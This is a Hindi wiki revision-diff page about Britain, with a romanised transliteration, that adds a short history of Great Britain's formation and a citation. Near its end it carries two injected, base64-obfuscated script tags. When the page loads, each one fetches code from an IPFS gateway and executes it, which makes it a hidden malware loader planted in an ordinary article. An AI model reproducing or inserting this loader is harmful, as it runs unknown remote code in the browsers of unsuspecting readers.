Difference between revisions of "ब्रिटेन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Canterbury-Cathedral.jpg|thumb|कैंटरबरी कैथेड्रल, [[इंग्लैंड]]]]
 
[[चित्र:Canterbury-Cathedral.jpg|thumb|कैंटरबरी कैथेड्रल, [[इंग्लैंड]]]]
 
'''ब्रिटेन''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]: Britain) [[यूरोप]] में स्थित संयुक्त राजशाही देश का सबसे बड़ा हिस्सा है। ब्रिटेन में [[इंग्लैंड]], [[स्कॉटलैंड]] और वेल्स प्रांत शामिल हैं। ब्रिटेन एक द्वीप पर बसा है।
 
'''ब्रिटेन''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]: Britain) [[यूरोप]] में स्थित संयुक्त राजशाही देश का सबसे बड़ा हिस्सा है। ब्रिटेन में [[इंग्लैंड]], [[स्कॉटलैंड]] और वेल्स प्रांत शामिल हैं। ब्रिटेन एक द्वीप पर बसा है।
 +
==ग्रेट ब्रिटेन==
 +
ग्रेट ब्रिटेन [[यूरोप महाद्वीप]] के उत्तर-पश्चिम स्थित यह बृहत्‌ [[द्वीप]] है जिसमें स्कॉटलैंड, वेल्स तथा इंग्लैंड सम्मिलित हैं। 1282 ई. में इंग्लैंड ने वेल्स पर विजय प्राप्त की तथा 1707 ई. में स्कॉटलैंड विधानत: इंग्लैड में मिला गया। इन संयुक्त राज्यों का नाम तभी (1707 ई.) से ग्रेट ब्रिटेन पड़ गया। ग्रेट ब्रिटेन प्राचीन रोमन ब्रिटैनिया मेजर शब्द का [[अनुवाद]] है।<ref>{{cite web |url=http://khoj.bharatdiscovery.org/india/%E0%A4%97%E0%A5%8D%E0%A4%B0%E0%A5%87%E0%A4%9F_%E0%A4%AC%E0%A5%8D%E0%A4%B0%E0%A4%BF%E0%A4%9F%E0%A5%87%E0%A4%A8|title=ग्रेट ब्रिटेन|accessmonthday=4 अगस्त |accessyear=2014 |last= |first= |authorlink= |format= |publisher=भारतखोज |language= हिंदी}}</ref>
 +
 +
 +
 +
 +
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
[[Category:विदेशी स्थान]]
+
[[Category:विदेशी स्थान]][[Category:अंतरराष्ट्रीय जगत]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 13:03, 4 August 2014

[[chitr:Canterbury-Cathedral.jpg|thumb|kaiantarabari kaithedral, ianglaiand]] briten (aangrezi: Britain) yoorop mean sthit sanyukt rajashahi desh ka sabase b da hissa hai. briten mean ianglaiand, sk aautalaiand aur vels praant shamil haian. briten ek dvip par basa hai.

gret briten

gret briten yoorop mahadvip ke uttar-pashchim sthit yah brihath‌ dvip hai jisamean sk aautalaiand, vels tatha ianglaiand sammilit haian. 1282 ee. mean ianglaiand ne vels par vijay prapt ki tatha 1707 ee. mean sk aautalaiand vidhanat: ianglaid mean mila gaya. in sanyukt rajyoan ka nam tabhi (1707 ee.) se gret briten p d gaya. gret briten prachin roman britainiya mejar shabd ka anuvad hai.[1]




panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. gret briten (hiandi) bharatakhoj. abhigaman tithi: 4 agast, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>